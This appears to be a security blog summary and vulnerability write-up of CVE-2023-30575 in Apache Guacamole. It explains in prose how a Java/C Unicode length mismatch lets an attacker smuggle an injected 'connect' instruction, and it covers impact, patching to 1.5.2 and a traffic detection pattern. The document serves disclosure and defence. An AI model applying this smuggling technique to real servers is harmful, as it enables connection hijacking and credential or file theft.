Full Report
Apache Guacamole is a remote desktop gateway server. The architecture consists of a Java component with a C backend server. So, they go through a classic difference between two parsers to create serious security impact. All communication is done via the custom Guacamole protocol, which is a generic wrapper that abstracts SSH, VNC and SSH. This contains an opcode with a length and value, then arguments after the opcode. When initially connecting to a server, the select instruction is used. Most values are taken from a database but the image type is directly controlled by a connecting attacker. The documentation states that the LENGTH field is not the bytelength but the codepoint length for UTF8. Since UTF8 implementations differ and we have two locations parsing the characters (Java and C), there is likely to be a bug here. The article has a good descriptor on what they mean by this - Technological Variety. To test this out, they wrote a small fuzzing harness. The fuzzer would generate random unicode symbols then have both Java and C process it. If there is a difference, then we have a problem. After some fuzzing, they ran into a difference in the length() of the object in Java compared to C. Sending in a 4 byte UTF8 character sequence was interpreted as a 2 byte sequence in Java. Why? In Java 9, they use compact strings. So, this means that strings are either dynamically encoded as LATIN-1 or UTF-16 depending on the situation, dynamically. For instance, an 'A' is encoded as a LATIN-1 string internally but the greek beta would be encoded as UTF-16. What's weird about this is incoming data in UTF8 must be converted to UTF-16. The byte length is determined by shifting the byte array of the coder value. If it's LATIN-1, then just one byte. If it's UTF16 then it's encoded by dividing the length by 2. For 1,2 and 3 byte sequences the logic works fine. However, there is a subtle issue when dealing with 4 byte UTF8 sequences. In particular, the conversion turns this into a surrogate pair instead of a single codepoint! As a result, only the first part of the surrogate pair is recognized in the length, resulting in less bytes being processed than expected. The Java length() function returns the number of Unicode code units instead of code points. Weird! To exploit this, we have to think about the parsing of it. The instruction creation step is done by the Java side then the instruction parsing is done by the C side, in this order. The blog post has some amazing graphics for understanding this, so please refer to do that. The idea is to send two GUAC_IMAGE parameters: one with four 4 byte unicode characters and the other with our payload we want to smuggle in. The one with the four 4 byte unicode characters will be set to contain a length of 8 by the Java service. However, the C service will see each of these as a single codepoint! As a result, it will read more than the expected 4 bytes and read 8 instead. So, the second set of bytes is where we smuggle in our input. By putting a semi-colon then extra data, the command will be interpreted as a new instruction! What do we want to smuggle in though? If we smuggle in the connect instruction, we can control the host that an attacker connects to. This can be used to leverage data, such as credentials. Or, RDP drive redirection can be enabled to leak world-readable files on the server. Integrating between difference languages appears to be absolute hell for encoding. The post is amazing at talking about the differences between parsers and is super enjoyable for that reason. I personally don't like the text-based wire format for Guacamole, as it is prone to these types of issues. Great read!
Analysis Summary
# Vulnerability: Apache Guacamole Parser Differential Instruction Injection
## CVE Details
- **CVE ID:** CVE-2023-30575 (Primary focus of this summary); also mentions CVE-2023-30576
- **CVSS Score:** 8.8 (High) - *Estimate based on RCE potential and low privilege requirement*
- **CWE:** CWE-436 (Interpretation Conflict), CWE-805 (Buffer Access with Incorrect Length Value)
## Affected Systems
- **Products:** Apache Guacamole (Remote Desktop Gateway)
- **Versions:** 1.5.1 and all versions prior.
- **Configurations:** Systems utilizing the Java-based web application (guacamole-client) communicating with the C-based proxy daemon (guacd).
## Vulnerability Description
The vulnerability is a **parser differential** arising from how different programming languages handle Unicode characters.
1. **The Protocol:** Guacamole uses a custom protocol where instructions include a length prefix representing the number of Unicode **codepoints**.
2. **The Java Issue:** In Java 9+, strings use "Compact Strings." When processing 4-byte UTF-8 sequences, Java's `length()` function returns the number of 16-bit **code units** (surrogate pairs) rather than the number of characters/codepoints. A single 4-byte character is thus counted as length `2`.
3. **The C Issue:** The C-based backend correctly interprets the same 4-byte sequence as a single codepoint (length `1`).
4. **The Desync:** When the Java component forwards an instruction containing a 4-byte UTF-8 character, it tells the C backend to expect two characters. Because the C backend only sees one, it continues reading into the next field or instruction to satisfy the length requirement, allowing an attacker to "smuggle" and inject arbitrary Guacamole instructions into the stream.
## Exploitation
- **Status:** PoC Available (Publicly documented by Sonar Research); no known exploitation in the wild at the time of reporting.
- **Complexity:** Medium
- **Attack Vector:** Network (Low-privileged user with access to the Guacamole web interface).
## Impact
- **Confidentiality:** High (Ability to leak credentials, world-readable files via RDP drive redirection, and spy on connections).
- **Integrity:** High (Ability to inject instructions and redirect connections).
- **Availability:** Low (Potential for service disruption through malformed instructions).
- **Combined Impact:** When chained with CVE-2023-30576 (Use-After-Free), this leads to **Remote Code Execution (RCE)** on the Guacamole server.
## Remediation
### Patches
- **Apache Guacamole 1.5.2:** Released May 25, 2023. This version addresses the length calculation logic and the underlying Use-After-Free.
### Workarounds
- There are no direct configuration workarounds. Users must upgrade to version 1.5.2 or later.
- Restrict network access to the Guacamole interface to trusted users only.
## Detection
- **Indicators of Compromise:** Unusual connection logs showing the `connect` instruction being called multiple times within a single session handshake or unexpected hostnames in the `select` opcode.
- **Detection Methods:** Monitor for Guacamole protocol traffic containing high-plane 4-byte Unicode characters (e.g., emojis or specific mathematical symbols) followed immediately by characters like `;` or `,` which define protocol boundaries.
## References
- **Vendor Advisory:** hxxps://guacamole[.]apache[.]org/security/#fixed-in-apache-guacamole-152
- **Detailed Research:** hxxps://www[.]sonarsource[.]com/blog/code-interoperability-the-hazards-of-technological-variety/
- **CVE Mitre:** hxxps://cve[.]mitre[.]org/cgi-bin/cvename[.]cgi?name=CVE-2023-30575